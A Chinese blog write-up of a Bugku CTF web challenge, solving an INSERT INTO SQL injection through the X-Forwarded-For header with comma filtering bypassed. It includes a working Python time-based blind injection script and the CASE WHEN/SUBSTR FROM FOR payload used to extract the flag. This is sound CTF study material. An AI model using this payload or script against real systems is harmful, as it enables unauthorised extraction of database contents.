bugku web——INSERT INTO注入

本文探讨了在Bugku Web平台中遇到的INSERT INTO SQL注入问题,由于请求头可能存在SQL注入,并且系统过滤了逗号,作者通过使用CASE WHEN...THEN SLEEP(1) ELSE END语句绕过了逗号过滤,实现了基于时间的盲注。文中还提到了字段和表名均为'flag'的特殊情况,并分享了学习到的remote_addr、x_forwarded_for以及explode()函数的相关知识。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

bugku web——INSERT INTO注入

最爱的代码审计来
初步判断存在sql注入(请求头)
并且过滤了逗号
在这里插入图片描述

抓包试了一下,网页上没有回显点,所以是基于时间的盲注()

正常时间盲注用这种格式来完成 if(exp1,exp2,exp3)
但是代码中explode()函数已经将逗号过滤掉了
所以采用这种格式:case when exp1 then sleep(1) else end 来绕过逗号的过滤
exp1中字符串截取subtr1(str,1,1)又存在逗号,于是这里用substr (str) from 1 for 1

字段是flag,表名也是flag,至于为什么,网上大佬说是出题人和做题人的默契
写一个脚本:

import requests
url="http://123.206.87.240:8002/web15/"
flag=""
for i in range(1,33):
    for str1 in "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,_!@#$%^&*.":
        data="11' and (case when (substr((select group_concat(flag) from flag) from " + str(i) + " for 1 )='" + str1 + "') then sleep(4) else 1 end )) #"
        # print data
        headers = {"x-forwarded-for":data}
        try:
            result = requests.get(url,headers=headers,timeout=3)
        except requests.exceptions.ReadTimeout as e:
            flag += str1
            print (flag)
            break
print( 'flag:' + flag)

知识点补充:

remote_addr和x_forwarded_for
原文链接:https://www.cnblogs.com/kuracola/p/7482939.html
在这里插入图片描述

explode()函数
原文链接:https://www.w3school.com.cn/php/func_string_explode.asp
把字符串打散为数组

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值